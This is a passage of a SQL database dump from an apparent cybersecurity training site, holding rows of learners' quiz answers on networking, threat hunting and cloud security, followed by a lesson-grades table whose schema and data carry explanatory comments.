(329, 232, 6073, 'Possible C2 communication', 1, '2026-03-10 16:37:29'),
(330, 232, 6074, 'dns.log', 1, '2026-03-10 16:37:29'),
(331, 232, 6075, 'PCAP', 1, '2026-03-10 16:37:29'),
(332, 232, 6052, 'Network Traffic Analysis', 1, '2026-03-10 16:42:21'),
(333, 232, 6053, 'Encryption (TLS)', 1, '2026-03-10 16:42:22'),
(334, 232, 6054, 'Source/Destination IPs and ports', 1, '2026-03-10 16:42:22'),
(335, 232, 6055, 'A switch port that mirrors traffic for monitoring', 1, '2026-03-10 16:46:19'),
(336, 232, 6056, 'PCAP', 1, '2026-03-10 16:46:20'),
(337, 232, 6057, 'Wireshark', 1, '2026-03-10 16:46:20'),
(338, 232, 6058, 'Follow TCP Stream', 1, '2026-03-10 16:56:34'),
(339, 232, 6059, 'Showing only relevant packets', 1, '2026-03-10 16:56:34'),
(340, 232, 6060, 'dns', 1, '2026-03-10 16:56:35'),
(341, 232, 6061, 'SYN', 1, '2026-03-10 16:58:04'),
(342, 232, 6062, 'Export Objects > HTTP', 1, '2026-03-10 16:58:05'),
(343, 232, 6063, 'Buffer overflow attempt', 1, '2026-03-10 16:58:05'),
(344, 232, 6064, 'Regular, timed connections to a C2 server', 1, '2026-03-10 17:05:42'),
(345, 232, 6065, 'Default Metasploit/Meterpreter port', 1, '2026-03-10 17:05:43'),
(346, 232, 6066, 'Domain Generation Algorithm', 1, '2026-03-10 17:05:43'),
(347, 232, 6076, 'SOC reacts to alerts; Hunting proactively searches', 1, '2026-03-10 17:32:43'),
(348, 232, 6077, 'Time an attacker stays undetected in the network', 1, '2026-03-10 17:32:43'),
(349, 232, 6078, 'They specifically evade automated detection', 1, '2026-03-10 17:32:44'),
(350, 232, 6079, 'Pre-defined rules/signatures', 1, '2026-03-10 17:37:08'),
(351, 232, 6080, 'Create a detection rule for future attacks', 1, '2026-03-10 17:37:08'),
(352, 232, 6081, 'Proactive and hypothesis-driven', 1, '2026-03-10 17:37:09'),
(353, 232, 6082, 'Form a Hypothesis', 1, '2026-03-10 17:40:07'),
(354, 232, 6083, 'No, you learned what normal looks like', 1, '2026-03-10 17:40:10'),
(355, 232, 6084, 'Document findings and create detections', 1, '2026-03-10 17:40:10'),
(356, 232, 6085, 'Specific, actionable, based on threat intel', 1, '2026-03-10 17:48:56'),
(357, 232, 6086, 'MITRE ATT&CK', 1, '2026-03-10 17:48:56'),
(358, 232, 6087, 'Something bad might happen (too vague)', 1, '2026-03-10 17:48:56'),
(359, 232, 6088, 'EDR', 1, '2026-03-10 17:51:33'),
(360, 232, 6089, 'Determines how far back you can hunt', 1, '2026-03-10 17:51:34'),
(361, 232, 6090, 'Sysmon', 1, '2026-03-10 17:51:34'),
(362, 232, 6091, 'Rare occurrences (outliers)', 1, '2026-03-10 17:54:27'),
(363, 232, 6092, 'Values that appear very rarely', 1, '2026-03-10 17:54:27'),
(364, 232, 6093, 'Moving from one indicator to related data', 1, '2026-03-10 17:54:28'),
(365, 232, 6094, 'Proactive search for undetected threats', 1, '2026-03-10 17:54:49'),
(366, 232, 6095, 'Time attacker remains undetected', 1, '2026-03-10 17:54:49'),
(367, 232, 6096, 'Specific and actionable', 1, '2026-03-10 17:54:50'),
(368, 232, 6097, 'MITRE ATT&CK', 1, '2026-03-10 17:54:50'),
(369, 232, 6098, 'Rare occurrences', 1, '2026-03-10 17:54:50'),
(370, 232, 6099, 'Create a detection rule', 1, '2026-03-10 17:54:51'),
(371, 225, 5264, 'C:', 1, '2026-03-10 22:49:29'),
(372, 225, 5265, 'NTFS', 1, '2026-03-10 22:49:30'),
(373, 225, 5266, '4 GB', 1, '2026-03-10 22:49:30'),
(374, 225, 5267, 'User Account Control', 1, '2026-03-10 22:54:34'),
(375, 225, 5268, 'Blue', 1, '2026-03-10 22:54:35'),
(376, 225, 5269, 'Always Notify', 1, '2026-03-10 22:54:35'),
(377, 225, 5270, 'HKLM', 1, '2026-03-11 04:06:22'),
(378, 225, 5271, 'regedit', 1, '2026-03-11 04:06:23'),
(379, 225, 5272, 'REG_SZ', 1, '2026-03-11 04:06:23'),
(380, 260, 5339, 'Network', 1, '2026-03-11 04:52:09'),
(381, 260, 5340, 'Segments', 1, '2026-03-11 04:52:10'),
(382, 260, 5341, 'Presentation', 1, '2026-03-11 04:52:11'),
(383, 260, 5342, 'TCP', 1, '2026-03-11 04:57:06'),
(384, 260, 5343, 'Speed', 1, '2026-03-11 04:57:07'),
(385, 260, 5344, 'Internet', 1, '2026-03-11 04:57:07'),
(386, 232, 6100, 'Knowledge base of adversary tactics and techniques', 1, '2026-03-11 16:47:50'),
(387, 232, 6101, 'The adversary\'s goal', 1, '2026-03-11 16:47:51'),
(388, 232, 6102, 'Enterprise', 1, '2026-03-11 16:47:51'),
(389, 232, 6103, '14', 1, '2026-03-11 16:54:37'),
(390, 232, 6104, 'Credential Access', 1, '2026-03-11 16:54:37'),
(391, 232, 6105, 'Persistence', 1, '2026-03-11 16:54:38'),
(392, 232, 6106, 'A more specific method under a main technique', 1, '2026-03-11 17:07:41'),
(393, 232, 6107, 'PowerShell execution', 1, '2026-03-11 17:07:42'),
(394, 232, 6108, 'Real-world example of technique usage', 1, '2026-03-11 17:07:42'),
(395, 232, 6109, 'ATT&CK Navigator', 1, '2026-03-11 17:10:34'),
(396, 232, 6110, 'Tactics', 1, '2026-03-11 17:10:34'),
(397, 232, 6111, 'STIX', 1, '2026-03-11 17:10:35'),
(398, 232, 6112, 'Check if it detects specific techniques', 1, '2026-03-11 17:11:58'),
(399, 232, 6113, 'Identifying techniques you cannot detect', 1, '2026-03-11 17:11:58'),
(400, 232, 6114, 'Building defenses based on likely threat actors', 1, '2026-03-11 17:11:59'),
(401, 232, 6115, 'Adversarial Tactics, Techniques, and Common Knowledge', 1, '2026-03-11 17:15:44'),
(402, 232, 6116, '14', 1, '2026-03-11 17:15:44'),
(403, 232, 6117, 'How adversaries achieve goals', 1, '2026-03-11 17:15:45'),
(404, 232, 6118, 'Command and Scripting Interpreter', 1, '2026-03-11 17:15:45'),
(405, 232, 6119, 'Navigator', 1, '2026-03-11 17:15:45'),
(406, 232, 6120, 'Techniques you cannot detect', 1, '2026-03-11 17:15:46'),
(407, 225, 5273, 'Active Directory', 1, '2026-03-12 03:20:05'),
(408, 225, 5274, 'Domain Controller', 1, '2026-03-12 03:20:05'),
(409, 225, 5275, 'Kerberos', 1, '2026-03-12 03:20:06'),
(410, 225, 5276, 'Verb-Noun', 1, '2026-03-12 03:22:43'),
(411, 225, 5277, 'Get-Process', 1, '2026-03-12 03:22:44'),
(412, 225, 5278, '.ps1', 1, '2026-03-12 03:22:44'),
(413, 225, 5279, '4624', 1, '2026-03-12 04:05:06'),
(414, 225, 5280, '4625', 1, '2026-03-12 04:05:06'),
(415, 225, 5281, 'Security', 1, '2026-03-12 04:05:07'),
(416, 225, 5282, 'Group Policy Object', 1, '2026-03-12 05:09:39'),
(417, 225, 5283, 'gpupdate /force', 1, '2026-03-12 05:09:39'),
(418, 225, 5284, 'LSDOU', 1, '2026-03-12 05:09:40'),
(419, 225, 5285, 'Windows Defender', 1, '2026-03-12 05:13:47'),
(420, 225, 5286, 'Process Explorer', 1, '2026-03-12 05:13:47'),
(421, 225, 5287, 'BitLocker', 1, '2026-03-12 05:13:47'),
(422, 225, 5339, 'Network', 1, '2026-03-12 05:21:04'),
(423, 225, 5340, 'Segments', 1, '2026-03-12 05:21:04'),
(424, 225, 5341, 'Presentation', 1, '2026-03-12 05:21:05'),
(425, 225, 5342, 'TCP', 1, '2026-03-12 05:22:48'),
(426, 225, 5343, 'Speed', 1, '2026-03-12 05:22:48'),
(427, 225, 5344, 'Internet', 1, '2026-03-12 05:22:48'),
(428, 225, 5345, '192.168.1.10', 1, '2026-03-12 05:24:52'),
(429, 225, 5346, '32', 1, '2026-03-12 05:24:53'),
(430, 225, 5347, 'NAT', 1, '2026-03-12 05:24:53'),
(431, 225, 5348, '/24', 1, '2026-03-12 05:28:36'),
(432, 225, 5349, '254', 1, '2026-03-12 05:28:36'),
(433, 225, 5350, 'Network ID', 1, '2026-03-12 05:28:36'),
(434, 225, 5351, 'A', 1, '2026-03-12 05:30:16'),
(435, 225, 5352, 'MX', 1, '2026-03-12 05:30:17'),
(436, 225, 5353, 'DNS', 1, '2026-03-12 05:30:17'),
(437, 225, 5354, 'Discover', 1, '2026-03-12 05:31:37'),
(438, 225, 5355, 'IP to MAC', 1, '2026-03-12 05:31:38'),
(439, 225, 5356, 'ARP Spoofing', 1, '2026-03-12 05:31:38'),
(440, 225, 5357, '22', 1, '2026-03-12 05:33:01'),
(441, 225, 5358, 'Telnet', 1, '2026-03-12 05:33:02'),
(442, 225, 5359, 'SMB', 1, '2026-03-12 05:33:02'),
(443, 225, 5363, 'HTTP', 1, '2026-03-12 05:34:28'),
(444, 225, 5364, 'SuperSecret123', 1, '2026-03-12 05:34:29'),
(445, 225, 5365, 'Use HTTPS', 1, '2026-03-12 05:34:29'),
(446, 225, 5366, 'Router', 1, '2026-03-12 05:36:45'),
(447, 225, 5367, '127.0.0.1', 1, '2026-03-12 05:36:45'),
(448, 225, 5368, 'ping', 1, '2026-03-12 05:36:45'),
(449, 225, 5369, '255.255.255.0', 1, '2026-03-12 05:36:46'),
(450, 225, 5370, '80', 1, '2026-03-12 05:36:46'),
(451, 225, 5371, '443', 1, '2026-03-12 05:36:47'),
(452, 225, 5372, '53', 1, '2026-03-12 05:36:47'),
(453, 225, 5373, 'Physical', 1, '2026-03-12 05:36:47'),
(454, 225, 5374, '32 bits', 0, '2026-03-12 05:36:48'),
(455, 225, 5375, '64 bits', 0, '2026-03-12 05:36:48'),
(456, 225, 5376, 'TCP', 1, '2026-03-12 05:36:49'),
(457, 225, 5377, 'SYN', 1, '2026-03-12 05:36:49'),
(458, 225, 5378, 'Discover', 1, '2026-03-12 05:36:49'),
(459, 225, 5379, '192.168.1.50', 1, '2026-03-12 05:36:50'),
(460, 225, 5380, 'Resolves IP to MAC', 1, '2026-03-12 05:36:50'),
(461, 225, 5381, 'ICMP', 1, '2026-03-12 05:36:50'),
(462, 225, 5382, 'Switch', 1, '2026-03-12 05:36:51'),
(463, 225, 5383, 'AAAA', 1, '2026-03-12 05:36:51'),
(464, 225, 5384, '21', 1, '2026-03-12 05:36:52'),
(465, 225, 5385, 'Packet Capture', 1, '2026-03-12 05:36:52'),
(466, 225, 5427, 'Confidentiality', 1, '2026-03-13 02:27:15'),
(467, 225, 5428, 'Integrity', 1, '2026-03-13 02:27:16'),
(468, 225, 5429, 'Availability', 1, '2026-03-13 02:27:16'),
(469, 225, 5430, 'Biometrics', 1, '2026-03-13 02:33:05'),
(470, 225, 5431, 'Smart Card', 1, '2026-03-13 02:33:05'),
(471, 225, 5432, 'MFA', 1, '2026-03-13 02:33:06'),
(472, 225, 5433, 'Authentication', 1, '2026-03-13 02:35:31'),
(473, 225, 5434, 'MAC', 1, '2026-03-13 02:35:32'),
(474, 225, 5435, 'Least Privilege', 1, '2026-03-13 02:35:32'),
(475, 225, 5436, 'Accounting', 1, '2026-03-13 02:36:36'),
(476, 225, 5437, 'Non-Repudiation', 1, '2026-03-13 02:36:37'),
(477, 225, 5438, 'Forensics', 1, '2026-03-13 02:36:37'),
(478, 225, 5439, 'Symmetric', 1, '2026-03-13 02:38:01'),
(479, 225, 5440, 'AES', 1, '2026-03-13 02:38:02'),
(480, 225, 5441, 'Readable data', 1, '2026-03-13 02:38:02'),
(481, 225, 5442, 'No', 1, '2026-03-13 02:39:28'),
(482, 225, 5443, 'Integrity', 1, '2026-03-13 02:39:29'),
(483, 225, 5444, 'SHA-256', 1, '2026-03-13 02:39:29'),
(484, 225, 5445, 'Layered Security', 1, '2026-03-13 02:41:06'),
(485, 225, 5446, 'Human', 1, '2026-03-13 02:41:06'),
(486, 225, 5447, 'Redundancy', 1, '2026-03-13 02:41:07'),
(487, 225, 5448, 'CIA', 1, '2026-03-13 02:43:47'),
(488, 225, 5449, 'Availability', 1, '2026-03-13 02:43:47'),
(489, 225, 5450, 'Biometrics', 1, '2026-03-13 02:43:48'),
(490, 225, 5451, 'Authentication', 1, '2026-03-13 02:43:48'),
(491, 225, 5452, 'Authorization', 1, '2026-03-13 02:43:49'),
(492, 225, 5453, 'MAC', 1, '2026-03-13 02:43:49'),
(493, 225, 5454, 'RBAC', 0, '2026-03-13 02:43:50'),
(494, 225, 5455, 'Accounting', 1, '2026-03-13 02:43:50'),
(495, 225, 5456, 'Asymmetric', 1, '2026-03-13 02:43:50'),
(496, 225, 5457, 'Symmetric', 1, '2026-03-13 02:43:51'),
(497, 225, 5458, 'Hashing', 1, '2026-03-13 02:43:51'),
(498, 225, 5459, 'SHA-256', 1, '2026-03-13 02:43:52'),
(499, 225, 5460, 'User Training', 1, '2026-03-13 02:43:52'),
(500, 225, 5461, 'Defense in Depth', 1, '2026-03-13 02:43:52'),
(501, 225, 5462, 'Proof of origin', 1, '2026-03-13 02:43:53'),
(502, 225, 5463, 'Hashing', 1, '2026-03-13 02:43:53'),
(503, 225, 5464, 'Multi-Factor Authentication', 1, '2026-03-13 02:43:54'),
(504, 225, 5465, 'No', 1, '2026-03-13 02:43:54'),
(505, 225, 5466, 'Network', 1, '2026-03-13 02:43:55'),
(506, 225, 5467, 'Authorization', 1, '2026-03-13 02:43:55'),
(507, 42, 5522, 'DEBUG', 0, '2026-03-13 10:09:26'),
(508, 42, 5523, 'root', 0, '2026-03-13 10:09:26'),
(509, 42, 5524, 'auth_db', 0, '2026-03-13 10:09:26'),
(510, 232, 6130, 'Cloud-native SIEM', 1, '2026-03-13 16:06:32'),
(511, 232, 6131, 'Just-in-time admin access', 1, '2026-03-13 16:06:32'),
(512, 232, 6132, 'Key Vault', 1, '2026-03-13 16:06:33'),
(513, 232, 6133, 'Misconfigurations', 1, '2026-03-13 16:09:14'),
(514, 232, 6134, 'Cloud Security Posture Management', 1, '2026-03-13 16:09:14'),
(515, 232, 6135, 'A critical misconfiguration', 1, '2026-03-13 16:09:14'),
(516, 232, 6136, 'Provider', 0, '2026-03-13 16:10:22'),
(517, 232, 6137, 'Security responsibilities between customer and provider', 1, '2026-03-13 16:10:23'),
(518, 232, 6138, 'GuardDuty', 1, '2026-03-13 16:10:23'),
(519, 232, 6139, 'Cloud-native SIEM', 1, '2026-03-13 16:10:24'),
(520, 232, 6140, 'A major security risk', 1, '2026-03-13 16:10:24'),
(521, 232, 6141, 'Cloud misconfigurations', 1, '2026-03-13 16:10:24'),
(522, 232, 6121, 'The customer', 1, '2026-03-13 16:15:54'),
(523, 232, 6122, 'SaaS', 1, '2026-03-13 16:15:54'),
(524, 232, 6123, 'IaaS', 1, '2026-03-13 16:15:54'),
(525, 232, 6124, 'The cloud provider', 1, '2026-03-13 16:17:24'),
(526, 232, 6125, 'The customer (always)', 1, '2026-03-13 16:17:24'),
(527, 232, 6126, 'Data and user access', 1, '2026-03-13 16:17:24'),
(528, 232, 6127, 'CloudTrail', 1, '2026-03-13 16:18:40'),
(529, 232, 6128, 'Public Access', 1, '2026-03-13 16:18:41'),
(530, 232, 6129, 'Identity and Access Management', 1, '2026-03-13 16:18:41'),
(531, 232, 6142, 'Being overwhelmed by too many alerts', 1, '2026-03-14 04:50:02'),
(532, 232, 6143, 'Speed and consistency', 1, '2026-03-14 04:50:02'),
(533, 232, 6144, 'Repetitive enrichment lookups', 1, '2026-03-14 04:50:02'),
(534, 232, 6145, 'Security Orchestration, Automation, and Response', 1, '2026-03-14 04:52:41'),
(535, 232, 6146, 'TheHive / Shuffle', 1, '2026-03-14 04:52:42'),
(536, 232, 6147, 'API integrations', 1, '2026-03-14 04:52:42'),
(537, 232, 6148, 'Trigger (what starts the workflow)', 1, '2026-03-14 04:56:27'),
(538, 232, 6149, 'For critical actions requiring approval', 1, '2026-03-14 04:56:27'),
(539, 232, 6150, 'Logging and error handling', 1, '2026-03-14 04:56:28'),
(540, 232, 6151, 'Isolate the host', 1, '2026-03-14 04:57:44'),
(541, 232, 6152, 'SIEM and Firewall blocklists', 1, '2026-03-14 04:57:45'),
(542, 232, 6153, 'Force password reset and revoke sessions', 1, '2026-03-14 04:57:45'),
(543, 232, 6154, 'requests', 1, '2026-03-14 04:58:48'),
(544, 232, 6155, 'Simple syntax and great libraries', 1, '2026-03-14 04:58:48'),
(545, 232, 6156, 'File hashes (MD5, SHA256)', 1, '2026-03-14 04:58:48'),
(546, 232, 6157, 'Security Orchestration, Automation, and Response', 1, '2026-03-14 04:59:15'),
(547, 232, 6158, 'Speed and consistency', 1, '2026-03-14 04:59:15'),
(548, 232, 6159, 'A trigger (e.g., SIEM alert)', 1, '2026-03-14 04:59:16'),
(549, 232, 6160, 'requests', 1, '2026-03-14 04:59:16'),
(550, 232, 6161, 'Isolate the host', 1, '2026-03-14 04:59:16'),
(551, 232, 6162, 'Open-source SOAR', 1, '2026-03-14 04:59:17'),
(552, 232, 6163, 'You will forget details later', 1, '2026-03-14 05:01:00'),
(553, 232, 6164, 'Legal evidence and audits', 1, '2026-03-14 05:01:00'),
(554, 232, 6165, 'Vague language like \"some malware\"', 1, '2026-03-14 05:01:00'),
(555, 232, 6166, 'UTC', 1, '2026-03-14 05:02:08'),
(556, 232, 6167, 'Timestamp, Source, Event, Actor', 1, '2026-03-14 05:02:10'),
(557, 232, 6168, 'To support claims with proof', 1, '2026-03-14 05:02:10'),
(558, 232, 6169, 'Executive Summary', 1, '2026-03-14 05:03:16'),
(559, 232, 6170, 'Leadership (non-technical)', 1, '2026-03-14 05:03:16'),
(560, 232, 6171, 'Raw logs, hashes, supporting evidence', 1, '2026-03-14 05:03:16'),
(561, 232, 6172, 'Technical jargon', 1, '2026-03-14 05:03:57'),
(562, 232, 6173, 'In business terms (money, data, reputation)', 1, '2026-03-14 05:03:57'),
(563, 232, 6174, 'What happened and are we safe?', 1, '2026-03-14 05:03:57'),
(564, 232, 6175, 'Mean Time to Detect', 1, '2026-03-14 05:04:33'),
(565, 232, 6176, 'Poor detection rules', 1, '2026-03-14 05:04:34'),
(566, 232, 6177, 'To identify trends and improvements', 1, '2026-03-14 05:04:34'),
(567, 232, 6178, 'UTC', 1, '2026-03-14 05:04:59'),
(568, 232, 6179, 'Leadership', 1, '2026-03-14 05:04:59'),
(569, 232, 6180, 'Mean Time to Respond', 1, '2026-03-14 05:04:59'),
(570, 232, 6181, 'Vague language', 1, '2026-03-14 05:05:00'),
(571, 232, 6182, 'Tracking trends over time', 1, '2026-03-14 05:05:00'),
(572, 232, 6183, 'Raw evidence and supporting data', 1, '2026-03-14 05:05:00'),
(573, 260, 5345, '192.168.1.10', 1, '2026-03-15 13:50:55'),
(574, 260, 5346, '32', 1, '2026-03-15 13:50:56'),
(575, 260, 5347, 'NAT', 1, '2026-03-15 13:50:57'),
(576, 260, 5348, '/24', 1, '2026-03-15 14:01:08'),
(577, 260, 5349, '254', 1, '2026-03-15 14:01:08'),
(578, 260, 5350, 'Network ID', 1, '2026-03-15 14:01:09'),
(579, 260, 5351, 'A', 1, '2026-03-15 14:12:54'),
(580, 260, 5352, 'MX', 1, '2026-03-15 14:12:54'),
(581, 260, 5353, 'DNS', 1, '2026-03-15 14:12:55'),
(582, 260, 5354, 'Discover', 1, '2026-03-15 16:04:36'),
(583, 260, 5355, 'IP to MAC', 1, '2026-03-15 16:04:36'),
(584, 260, 5356, 'ARP Spoofing', 1, '2026-03-15 16:04:37'),
(585, 260, 5357, '22', 1, '2026-03-15 16:15:05'),
(586, 260, 5358, 'Telnet', 1, '2026-03-15 16:15:05'),
(587, 260, 5359, 'SMB', 1, '2026-03-15 16:15:06'),
(588, 260, 5363, 'HTTP', 1, '2026-03-15 16:29:35'),
(589, 260, 5364, 'SuperSecret123', 1, '2026-03-15 16:29:35'),
(590, 260, 5365, 'Use HTTPS', 1, '2026-03-15 16:29:35'),
(591, 260, 5366, 'Router', 1, '2026-03-15 16:59:09'),
(592, 260, 5367, '127.0.0.1', 1, '2026-03-15 16:59:10'),
(593, 260, 5368, 'ping', 1, '2026-03-15 16:59:10'),
(594, 260, 5369, '255.255.255.0', 1, '2026-03-15 16:59:11'),
(595, 260, 5370, '80', 1, '2026-03-15 16:59:11'),
(596, 260, 5371, '443', 1, '2026-03-15 16:59:11'),
(597, 260, 5372, '53', 1, '2026-03-15 16:59:12'),
(598, 260, 5373, 'Application', 0, '2026-03-15 16:59:12'),
(599, 260, 5374, '48 bits', 1, '2026-03-15 16:59:13'),
(600, 260, 5375, '128 bits', 1, '2026-03-15 16:59:13'),
(601, 260, 5376, 'UDP', 0, '2026-03-15 16:59:14'),
(602, 260, 5377, 'SYN', 1, '2026-03-15 16:59:14'),
(603, 260, 5378, 'Discover', 1, '2026-03-15 16:59:14'),
(604, 260, 5379, '192.168.1.50', 1, '2026-03-15 16:59:15'),
(605, 260, 5380, 'Resolves IP to MAC', 1, '2026-03-15 16:59:15'),
(606, 260, 5381, 'ICMP', 1, '2026-03-15 16:59:16'),
(607, 260, 5382, 'Switch', 1, '2026-03-15 16:59:16'),
(608, 260, 5383, 'AAAA', 1, '2026-03-15 16:59:17'),
(609, 260, 5384, '20', 0, '2026-03-15 16:59:17'),
(610, 260, 5385, 'Password Cracking', 0, '2026-03-15 16:59:17'),
(611, 303, 5881, 'Connecting related events to detect threats', 1, '2026-03-15 17:37:42'),
(612, 303, 5882, 'Compliance and Forensic Investigation', 1, '2026-03-15 17:37:42'),
(613, 303, 5883, 'Forwarder / Agent', 1, '2026-03-15 17:37:43'),
(614, 260, 5427, 'Confidentiality', 1, '2026-03-15 18:10:48'),
(615, 260, 5428, 'Integrity', 1, '2026-03-15 18:10:49'),
(616, 260, 5429, 'Availability', 1, '2026-03-15 18:10:49'),
(617, 260, 5430, 'Biometrics', 1, '2026-03-15 18:24:12'),
(618, 260, 5431, 'Smart Card', 1, '2026-03-15 18:24:13'),
(619, 260, 5432, 'MFA', 1, '2026-03-15 18:24:13'),
(620, 260, 5433, 'Authentication', 1, '2026-03-15 18:57:21'),
(621, 260, 5434, 'MAC', 1, '2026-03-15 18:57:21'),
(622, 260, 5435, 'Least Privilege', 1, '2026-03-15 18:57:22'),
(623, 260, 5436, 'Accounting', 1, '2026-03-15 19:44:14'),
(624, 260, 5437, 'Non-Repudiation', 1, '2026-03-15 19:44:14'),
(625, 260, 5438, 'Forensics', 1, '2026-03-15 19:44:15'),
(626, 260, 5439, 'Symmetric', 1, '2026-03-15 20:23:10'),
(627, 260, 5440, 'AES', 1, '2026-03-15 20:23:11'),
(628, 260, 5441, 'Readable data', 1, '2026-03-15 20:23:11'),
(629, 260, 5442, 'No', 1, '2026-03-15 20:44:12'),
(630, 260, 5443, 'Integrity', 1, '2026-03-15 20:44:13'),
(631, 260, 5444, 'SHA-256', 1, '2026-03-15 20:44:13'),
(632, 260, 5445, 'Layered Security', 1, '2026-03-15 21:16:39'),
(633, 260, 5446, 'Human', 1, '2026-03-15 21:16:40'),
(634, 260, 5447, 'Redundancy', 1, '2026-03-15 21:16:40'),
(635, 260, 5448, 'CIA', 1, '2026-03-15 21:27:46'),
(636, 260, 5449, 'Availability', 1, '2026-03-15 21:27:47'),
(637, 260, 5450, 'Biometrics', 1, '2026-03-15 21:27:48'),
(638, 260, 5451, 'Authentication', 1, '2026-03-15 21:27:49'),
(639, 260, 5452, 'Authorization', 1, '2026-03-15 21:27:49'),
(640, 260, 5453, 'MAC', 1, '2026-03-15 21:27:50'),
(641, 260, 5454, 'DAC', 1, '2026-03-15 21:27:50'),
(642, 260, 5455, 'Accounting', 1, '2026-03-15 21:27:51'),
(643, 260, 5456, 'Asymmetric', 1, '2026-03-15 21:27:52'),
(644, 260, 5457, 'Symmetric', 1, '2026-03-15 21:27:53'),
(645, 260, 5458, 'Hashing', 1, '2026-03-15 21:27:53'),
(646, 260, 5459, 'SHA-256', 1, '2026-03-15 21:27:54'),
(647, 260, 5460, 'User Training', 1, '2026-03-15 21:27:54'),
(648, 260, 5461, 'Defense in Depth', 1, '2026-03-15 21:27:55'),
(649, 260, 5462, 'Proof of origin', 1, '2026-03-15 21:27:55'),
(650, 260, 5463, 'Hashing', 1, '2026-03-15 21:27:56'),
(651, 260, 5464, 'Multi-Factor Authentication', 1, '2026-03-15 21:27:57'),
(652, 260, 5465, 'No', 1, '2026-03-15 21:27:57'),
(653, 260, 5466, 'Network', 1, '2026-03-15 21:27:58'),
(654, 260, 5467, 'Authorization', 1, '2026-03-15 21:27:58');

-- --------------------------------------------------------

--
-- Table structure for table `user_lesson_grades`
--

-- One row per graded attempt at a lesson task (see the data dump that
-- follows). This dump was exported with the session time zone set to
-- +00:00, so `completed_at` values are UTC.
CREATE TABLE `user_lesson_grades` (
  `id` int(11) NOT NULL,                  -- surrogate key; PRIMARY KEY / AUTO_INCREMENT are presumably added by a later ALTER TABLE in this dump (phpMyAdmin style) — not visible here
  `user_id` int(11) NOT NULL,             -- no FOREIGN KEY declared here; integrity to the users table is presumably left to the application — verify
  `task_id` int(11) NOT NULL,             -- likewise, no FK to the task table
  `score` decimal(5,2) NOT NULL,          -- percentage-style score (0.00–100.00 in the data below); NOT always correct_answers/total_questions*100, see the notes on the INSERT
  `total_questions` int(11) NOT NULL,
  `correct_answers` int(11) NOT NULL,     -- no CHECK that correct_answers <= total_questions; the schema does not enforce it
  `passed` tinyint(1) DEFAULT 0,          -- boolean flag; the pass threshold is decided by the application, not by the schema
  `completed_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_lesson_grades`
--

-- Notes on the rows below (all observations from this dump, nothing inferred
-- from the application):
--  * `score` is not always correct_answers / total_questions * 100: ids 4, 5
--    and 183 are 1/1 yet scored 92.00 / 85.00 / 85.00, so the score is
--    presumably produced by a separate grader — do not recompute it from the
--    two counts.
--  * `passed` is 0 only for ids 15 (40.00) and 164 (0.00); every score of
--    80.00 and above is marked passed, so the threshold lies somewhere in
--    between and is not visible in the schema.
--  * `id` order is not chronological (e.g. ids 146→147, 152→153, 183→184
--    step backwards in `completed_at`); order by `completed_at`, not `id`,
--    when a timeline is needed.
--  * No (user_id, task_id) pair repeats in this dump, but nothing in the
--    schema prevents it, so readers should not assume one row per pair.
INSERT INTO `user_lesson_grades` (`id`, `user_id`, `task_id`, `score`, `total_questions`, `correct_answers`, `passed`, `completed_at`) VALUES
(1, 34, 1, 100.00, 4, 4, 1, '2025-12-26 01:24:19'),
(2, 34, 3, 100.00, 4, 4, 1, '2025-12-26 02:00:03'),
(3, 1, 1, 100.00, 3, 3, 1, '2025-12-26 15:29:20'),
(4, 34, 349, 92.00, 1, 1, 1, '2025-12-26 18:37:54'), -- 1/1 but 92.00: score is not derived from the counts
(5, 34, 350, 85.00, 1, 1, 1, '2025-12-26 19:11:06'),
(6, 34, 6, 100.00, 1, 1, 1, '2025-12-26 20:10:11'),
(7, 34, 7, 100.00, 1, 1, 1, '2025-12-26 20:14:32'),
(8, 34, 8, 100.00, 1, 1, 1, '2025-12-26 20:20:31'),
(9, 34, 9, 100.00, 1, 1, 1, '2025-12-26 20:22:23'),
(10, 34, 10, 100.00, 1, 1, 1, '2025-12-26 20:26:35'),
(11, 34, 11, 100.00, 1, 1, 1, '2025-12-26 20:28:07'),
(12, 34, 12, 100.00, 1, 1, 1, '2025-12-26 20:29:15'),
(13, 34, 32, 80.00, 5, 4, 1, '2025-12-26 20:44:41'),
(14, 34, 33, 80.00, 5, 4, 1, '2025-12-26 20:46:41'),
(15, 34, 34, 40.00, 5, 2, 0, '2025-12-26 20:47:33'), -- failed attempt (passed = 0)
(16, 34, 54, 100.00, 3, 3, 1, '2025-12-26 21:14:00'),
(17, 1, 771, 100.00, 3, 3, 1, '2025-12-29 13:53:27'),
(18, 42, 1, 100.00, 3, 3, 1, '2025-12-30 13:40:31'),
(19, 42, 2, 100.00, 3, 3, 1, '2025-12-30 13:41:34'),
(20, 42, 3, 100.00, 3, 3, 1, '2025-12-30 13:42:10'),
(21, 42, 4, 100.00, 3, 3, 1, '2025-12-30 13:42:41'),
(22, 42, 5, 100.00, 3, 3, 1, '2025-12-30 13:43:10'),
(23, 42, 22, 100.00, 3, 3, 1, '2025-12-30 13:45:54'),
(24, 42, 23, 100.00, 3, 3, 1, '2025-12-30 13:46:37'),
(25, 42, 24, 100.00, 3, 3, 1, '2025-12-30 13:47:42'),
(26, 42, 25, 100.00, 3, 3, 1, '2025-12-30 13:50:19'),
(27, 42, 26, 100.00, 3, 3, 1, '2025-12-30 13:51:39'),
(28, 42, 27, 100.00, 3, 3, 1, '2025-12-30 13:52:49'),
(29, 42, 28, 100.00, 3, 3, 1, '2025-12-30 13:53:51'),
(30, 65, 1, 100.00, 3, 3, 1, '2026-01-06 16:28:31'),
(31, 74, 1, 100.00, 3, 3, 1, '2026-01-12 06:32:13'),
(32, 74, 54, 100.00, 3, 3, 1, '2026-01-12 06:52:12'),
(33, 74, 2, 100.00, 3, 3, 1, '2026-01-17 08:38:34'),
(34, 74, 3, 100.00, 3, 3, 1, '2026-01-17 08:39:31'),
(35, 74, 4, 100.00, 3, 3, 1, '2026-01-17 08:40:24'),
(36, 74, 5, 100.00, 3, 3, 1, '2026-01-17 08:41:02'),
(37, 107, 2, 100.00, 3, 3, 1, '2026-02-02 15:00:17'),
(38, 107, 3, 100.00, 3, 3, 1, '2026-02-02 15:12:49'),
(39, 107, 4, 100.00, 3, 3, 1, '2026-02-02 15:17:44'),
(40, 107, 5, 100.00, 3, 3, 1, '2026-02-02 15:21:56'),
(41, 107, 1, 100.00, 3, 3, 1, '2026-02-02 15:27:10'),
(42, 34, 359, 100.00, 1, 1, 1, '2026-02-05 19:28:01'),
